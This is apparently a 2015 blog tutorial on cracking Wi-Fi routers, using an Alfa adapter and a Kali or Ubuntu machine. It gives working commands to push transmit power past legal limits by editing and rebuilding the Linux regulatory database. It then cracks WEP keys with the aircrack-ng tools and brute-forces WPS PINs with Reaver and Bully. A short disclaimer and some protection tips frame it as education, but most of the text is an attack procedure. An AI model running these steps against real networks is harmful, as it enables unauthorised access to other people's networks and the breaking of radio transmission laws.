How to hack WEP-protected or WPS-enabled Wi-Fi routers with an Alfa AWUS036NH, or: how to protect your Wi-Fi

  • Posted on: 22 May 2015
  • By: Don

A hacker can sit three miles away from a house and he is still able to hack into the router and use the Wi-Fi. But how?

Legal

1. It's illegal to hack other people's Wi-Fi routers. Use this guide just for educational purposes and test it just with own access points (APs).
2. It is forbidden to remove all transmit power restrictions. Every country has own transmit power limits.

Tools

- The software: Linux (Kali has everything preinstalled and is recommended; for Ubuntu and other distros, you need to install the needed packages).
- The hardware: the wireless adapter Alfa AWUS036NH (which supports Monitor Mode, Packet Injections, and 2000mW transmit power = 33 dBm).
- The knowledge: basic Linux knowledge, basic network security knowledge.

Hack the TX Power, or: Move to Bolivia and change the limits

The Alfa AWUS036NH supports 2000mW, so a tx power of 33 dBm, but it comes per default with 20 dBm and your system allows a maximum of 30 dBm (=1000mW) for Bolivia. Set the possible:

(Open a Terminal, used OS in this case: Ubuntu 14.04.)

don@HAL:~$ sudo -s
root@HAL:~# iw reg set BO
root@HAL:~# iw reg get
country BO:
(2402 - 2482 @ 40), (N/A, 30)
(5735 - 5835 @ 80), (N/A, 30)
root@HAL:~# iwconfig wlan2 txpower 30

This changed the card's default of 20 dBm to 30 dBm. Check it:

root@HAL:~# iwconfig
wlan2 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
usb0 no wireless extensions.
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Higher txpower numbers have no effect at this state. But we want to double the transmit power (from currently 1000mW to 2000mW) by adding 3dBm more:

1. Install the packages:

root@HAL:~# apt-get install python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev

2. Download the CRDA files and the wireless regulatory database files:

Choose the latest .bz2 versions ...

https://www.kernel.org/pub/software/network/crda/

https://www.kernel.org/pub/software/network/wireless-regdb/

… and unzip them:

root@HAL:~# cd /home/don/Downloads
root@HAL:~/Downloads# tar xvjf crda-1.1.3.tar.bz2

and

root@HAL:~/Downloads# tar xvjf wireless-regdb-2013.11.27

3. Change the highest limits:

Go to

root@HAL:/# cd /home/don/Downloads/wireless-regdb-2013.11.27

open

root@HAL:~/Downloads/wireless-regdb-2013.11.27# nano db.txt

change Bolivia settings from

country BO: DFS-JP
(2402 - 2482 @ 40), (30)
(5735 - 5835 @ 80), (30)

to

country BO: DFS-JP
(2402 - 2482 @ 40), (33)
(5735 - 5835 @ 80), (30)

and save it with Ctrl+X, then Y, and finally Enter.

4. Swap the old regulatory file with the new one:

Enter the make command:

root@HAL:~/Downloads/wireless-regdb-2013.11.27# make

Go to the old regulatory.db location:

root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd /lib/crda

Make preventively a file backup:

root@HAL:/lib/crda# mv regulatory.bin regulatoryOLD.bin

Go back to the directory of the new regulatory.bin and copy it over:

root@HAL:/lib/crda# cd ~/Downloads/wireless-regdb-2013.11.27
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cp regulatory.bin /lib/crda/regulatory.bin
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd /lib/crda
root@HAL:/lib/crda# ls
pubkeys regulatory.bin regulatoryOLD.bin setregdomain

5. Validate the new regulatory.db:

Copy ...

root@HAL:/lib/crda# cd ~/Downloads/wireless-regdb-2013.11.27
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cp root.key.pub.pem ~/Downloads/crda-1.1.3/pubkeys/root.key.pub.pem
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cp linville.key.pub.pem ~/Downloads/crda-1.1.3/pubkeys/linville.key.pub.pem

… and verify:

root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd ~/Downloads/crda-1.1.3/pubkeys
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd ~/Downloads/crda-1.1.3/pubkeys
root@HAL:~/Downloads/crda-1.1.3/pubkeys# ls
linville.key.pub.pem root.key.pub.pem

6. Make install:

root@HAL:~/Downloads/crda-1.1.3/pubkeys# cd ~/Downloads/crda-1.1.3
root@HAL:~/Downloads/crda-1.1.3# make
root@HAL:~/Downloads/crda-1.1.3# make install

7. Reboot and set then:

don@HAL:~$ sudo -s
root@HAL:~# iw reg set BO
root@HAL:~# iw reg get
country BO:
(2402 - 2482 @ 40), (N/A, 33)
(5735 - 5835 @ 80), (N/A, 30)
root@HAL:~# iwconfig wlan2 txpower 33

The result (33 dBm = 2000mW):

root@HAL:~# iwconfig
wlan2 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=33 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
usb0 no wireless extensions.
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Troubleshooting:

It is also recommended to add the file (as superuser, sudo)

/etc/udev/rules.d/regulatory.rules

with the content

KERNEL==“regulatory*“, ACTION==“change“, SUBSYSTEM==“platform“, RUN+=“/sbin/iw reg set BO“

in order to keep it with these settings.

Let's hack your own WEP-protected router now

(You need to install the aircrack-ng packages if you are not using Kali.)

The old WEP standard is highly vulnerable. The whole hacking doesn't take more than an hour.

1. Root:

sudo -s

2. Check the wireless adapters:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

3. Capture Traffic and find your WEP-protected AP:

airodump-ng mon0

4. Capture from the found WEP AP:

airodump-ng --bssid 00:MY:WE:P0:12:34 -c 11 -w WEPoutput mon0

Change the bssid and the channel (-c) numbers. Wait till you capture a MAC address under the section STATION, like MM:AA:CC:5d:5w:r8.

5. Inject ARP Traffic to boost the process:

aireplay-ng -3 -b 00:MY:WE:P0:12:34 -h MM:AA:CC:5d:5w:r8 mon0

6. Crack the Password:

aircrack-ng WEPoutput-01.cap

Aircrack Note: “You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.”

Troubleshooting:

- If more than one output-file: aircrack-ng output*.cap
- FMS/Korek cracking method: aircrack-ng -K output.cap

Hack your own WPS-enabled router with Reaver

The WPA2 standard is safe – if you use a complex password and disable WPS. While running possible passwords against huge lists is just a vague bet, WPS cracking, if available, comes with clear results within 5 to 10 hours. New APs no longer have this WPS vulnerability, but those older than 2013 are still hackable through WPS.

1. Root:

sudo -s

2. Check the wireless adapter:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

4. Capture Traffic:

airodump-ng mon0

4. Start Reaver:

reaver -i mon0 -b 01:2A:DD:RE:SS:XX -vv

Toubleshooting:

- Specific: reaver -i mon0 -c 6 -b 01:2A:DD:RE:SS:XX -vv -L -N -d 15
- Waiting command: reaver -i mon0 -b 01:2A:DD:RE:SS:XX --fail-wait=360
- Timeout lower then 5s: reaver -i mon0 -b 01:2A:DD:RE:SS:XX -t 3
- No delay in pin attempts: reaver -i mon0 -b 01:2A:DD:RE:SS:XX -d 0

Hack your own WPS-enabled router with Bully

1. Root:

sudo -s

2. Check the wireless adapter:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

4. Capture Traffic:

airodump-ng mon0

5. Start Bully:

bully mon0 -b 01:2A:DD:RE:SS:XX -e MyAP -c 9

Change the parameters for -b (BSSID), -e (SSID), -c (channel).

Bully needs 4–6 hours to crack the WPS password.

So, how can I protect my Wi-Fi router from hackers

If someone is interested in hacking into your network, he can choose between so many ways to so. As of today, your Wi-Fi is safe if you do the following:

1. Don't use old routers, especially those with the unsafe WEP standard.
2. Turn the WPS off. Even on new routers with WPS vulnerability patches, disabling is the safer bet.
3. Use long, complex, and unnatural passwords: like U.bTj-L&kd+_da8eW$85.

Tags: